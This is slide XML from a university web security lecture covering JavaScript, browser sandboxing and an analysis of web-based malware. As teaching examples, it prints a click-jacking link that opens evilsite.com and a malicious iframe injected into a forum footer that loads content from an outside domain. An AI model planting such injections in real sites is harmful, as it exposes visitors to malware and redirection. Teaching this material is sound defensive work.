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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId57"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="696" r:id="rId2"/>
    <p:sldId id="512" r:id="rId3"/>
    <p:sldId id="637" r:id="rId4"/>
    <p:sldId id="540" r:id="rId5"/>
    <p:sldId id="638" r:id="rId6"/>
    <p:sldId id="656" r:id="rId7"/>
    <p:sldId id="657" r:id="rId8"/>
    <p:sldId id="658" r:id="rId9"/>
    <p:sldId id="659" r:id="rId10"/>
    <p:sldId id="716" r:id="rId11"/>
    <p:sldId id="717" r:id="rId12"/>
    <p:sldId id="718" r:id="rId13"/>
    <p:sldId id="719" r:id="rId14"/>
    <p:sldId id="720" r:id="rId15"/>
    <p:sldId id="640" r:id="rId16"/>
    <p:sldId id="725" r:id="rId17"/>
    <p:sldId id="726" r:id="rId18"/>
    <p:sldId id="727" r:id="rId19"/>
    <p:sldId id="728" r:id="rId20"/>
    <p:sldId id="729" r:id="rId21"/>
    <p:sldId id="730" r:id="rId22"/>
    <p:sldId id="731" r:id="rId23"/>
    <p:sldId id="732" r:id="rId24"/>
    <p:sldId id="733" r:id="rId25"/>
    <p:sldId id="734" r:id="rId26"/>
    <p:sldId id="735" r:id="rId27"/>
    <p:sldId id="736" r:id="rId28"/>
    <p:sldId id="737" r:id="rId29"/>
    <p:sldId id="738" r:id="rId30"/>
    <p:sldId id="739" r:id="rId31"/>
    <p:sldId id="740" r:id="rId32"/>
    <p:sldId id="741" r:id="rId33"/>
    <p:sldId id="641" r:id="rId34"/>
    <p:sldId id="721" r:id="rId35"/>
    <p:sldId id="722" r:id="rId36"/>
    <p:sldId id="723" r:id="rId37"/>
    <p:sldId id="724" r:id="rId38"/>
    <p:sldId id="642" r:id="rId39"/>
    <p:sldId id="661" r:id="rId40"/>
    <p:sldId id="662" r:id="rId41"/>
    <p:sldId id="663" r:id="rId42"/>
    <p:sldId id="664" r:id="rId43"/>
    <p:sldId id="665" r:id="rId44"/>
    <p:sldId id="666" r:id="rId45"/>
    <p:sldId id="667" r:id="rId46"/>
    <p:sldId id="668" r:id="rId47"/>
    <p:sldId id="669" r:id="rId48"/>
    <p:sldId id="670" r:id="rId49"/>
    <p:sldId id="671" r:id="rId50"/>
    <p:sldId id="672" r:id="rId51"/>
    <p:sldId id="673" r:id="rId52"/>
    <p:sldId id="674" r:id="rId53"/>
    <p:sldId id="675" r:id="rId54"/>
    <p:sldId id="676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12" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="149" d="100"/>
          <a:sy n="149" d="100"/>
        </p:scale>
        <p:origin x="-1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FCCF7-218F-604D-8E0A-1C0B1EF78881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2FF9-156C-0448-9A93-BC5FA52B9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19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0C6FB-C1E0-2D4C-B08A-94CEC554B545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275E-A216-904D-9D69-19F31E9E9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438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/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/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503238" y="4316413"/>
            <a:ext cx="5853112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1600">
                <a:latin typeface="Helvetica" pitchFamily="-84" charset="0"/>
                <a:ea typeface="Helvetica" pitchFamily="-84" charset="0"/>
                <a:cs typeface="Helvetica" pitchFamily="-84" charset="0"/>
                <a:sym typeface="Helvetica" pitchFamily="-84" charset="0"/>
              </a:rPr>
              <a:t>credit: john mitchell, stanford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 sz="2200">
                <a:latin typeface="Lucida Grande" pitchFamily="-84" charset="0"/>
                <a:ea typeface="Lucida Grande" pitchFamily="-84" charset="0"/>
                <a:cs typeface="Lucida Grande" pitchFamily="-84" charset="0"/>
                <a:sym typeface="Lucida Grande" pitchFamily="-84" charset="0"/>
              </a:rPr>
              <a:t>Add pop-ups for each piece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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="303213"/>
            <a:ext cx="1588" cy="15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503238" y="4316413"/>
            <a:ext cx="5853112" cy="4060825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FB9E9-0D2E-424A-B0B1-597A20F45D9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FF9F011-1C0D-F246-A72C-B26C2F7C1C60}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>39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21983BB-BBFB-8A47-B204-3D99D266AD1A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>40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115CA09A-62FE-364D-9E3A-FFEBAA935557}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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itchFamily="-11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07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26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59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365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16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536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4E9DE0C-EFE3-CE47-9792-88F31C147F5B}" type="slidenum">
              <a:rPr lang="en-US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15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27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808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33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A51A8-D50C-834F-AB52-7C17DAA3ED10}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"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987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unc.edu:81/class?name=cs535%23homewor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hyperlink" Target="http://www.example.com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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Web Security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Bailey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/>
              <a:t>ECE 422/CS 461 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– Fall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1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Web Pages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Rather than static HTML, web pages can be expressed as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, say written in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: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261455"/>
            <a:ext cx="7381634" cy="345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96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DOM Tree: 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1945" y="1600200"/>
            <a:ext cx="4214745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“The Document Object Model is a platform- and language-neutral interface that will allow programs and scripts to dynamically access and update the content, structure and style of documents.”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2131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4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Powerful web page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programming language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripts are embedded in web pages returned by web server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripts are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>executed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> by browser. Can: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Alter page contents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Track events </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(mouse clicks, motion, keystrokes)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Read/set cookies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Issue web requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, read replies </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>(Note: despite name, has nothing to do with Java!)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289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JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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60313"/>
            <a:ext cx="8229600" cy="556116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Scripting language interpreted by the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code enclosed within &lt;script&gt; … &lt;/script&gt; tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defining functions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	function hello() { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>alert("Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> world!"); }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Event handlers embedded in HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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img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="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>picture.gif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>onMouseOver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript:hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Built-in functions can change content of window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0"/>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>.open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>http://umich.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click-jacking attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0"/>
              <a:t>onMouseUp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0"/>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>.open(‘http://www.evilsite.com’)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>="http://www.trustedsite.com/"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t> me!&lt;/a&gt;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1577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Confining the Power of JavaScript Scripts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all that power, browsers need to make sure JS scripts don’t abuse it </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example, don’t want a script sent from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hackerz.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> web server to read cookies belonging to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>... or alter layout of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> web page </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>... or read keystrokes typed by user while focus is on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> page! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425438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Risk #1: we don’t want a malicious site to be able to trash my files/programs on my computer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browsing to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>awesomevids.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) should not infect my computer with malware, read or write files on my computer, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is sandboxed;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>try to avoid security bugs in browser code; privilege separation; automatic updates; etc.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￼The Ghost In The Browser Analysis of Web-based Malware</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>￼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Niels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Provos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Dean McNamee </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Panayiotis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mavrommatis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KeWang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Nagendra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Modadugu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3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Internet essential for everyday life: ecommerce, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware used to steal bank accounts or credit cards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>underground economy is very profitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Internet threats are changing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>remote exploitation and firewalls are yesterday</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser is a complex computation environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adversaries exploit browser to install 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￼￼To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>compromise your browser, we need to compromise your web server </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>easy to set up new site on the Internet </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>difficult to keep new site secure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insecure infrastructure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MySql,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Apache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>web applications: phpBB2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Invision</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.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88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Malicious Websites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Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>website automatically installs malware on visitor’s computer </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>usually via exploits in the browser or other software on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the client (without user consent) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using Google’s infrastructure to analyze several billion URLs.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28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architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basics of web security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shellshock vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Introduction to HTTPS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Detecting Malicious Websites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633" y="1417638"/>
            <a:ext cx="5389034" cy="518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46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Processing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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>VM gets about 300,000 suspicious URLs daily </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>About </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>10,000 to 30,000 are malicious </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRP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83" y="2596444"/>
            <a:ext cx="5960840" cy="42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2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/>
              <a:t>constitutes the content of a web page?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authored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>content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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-contributed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>content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dvertising</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>third</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-party widgets </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ceding control to 3rd party could be a security risk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13020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Web Server Security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compromise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>web server and change content directly </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>many vulnerabilities in web applications, apache itself, stolen passwords </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>templating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> system </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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9333" y="4336618"/>
            <a:ext cx="8974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&lt;!-- Copyright Information --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;div align='center' class='copyright'&gt;Powered by </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>www.invisionboard.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Invision</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Power Board&lt;/a&gt;(U) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>v1.3.1 Final &amp;copy; 2003 &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nbsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>='http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>www.invisionpower.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'&gt;IPS, Inc.&lt;/a&gt;&lt;/div&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;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='http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wsfgfdgrtyhgfd.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>adv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/193/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>new.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; 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='http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wsfgfdgrtyhgfd.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>adv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>new.php?adv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=193'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;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3246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by </a:t>
            </a:r>
            <a:r>
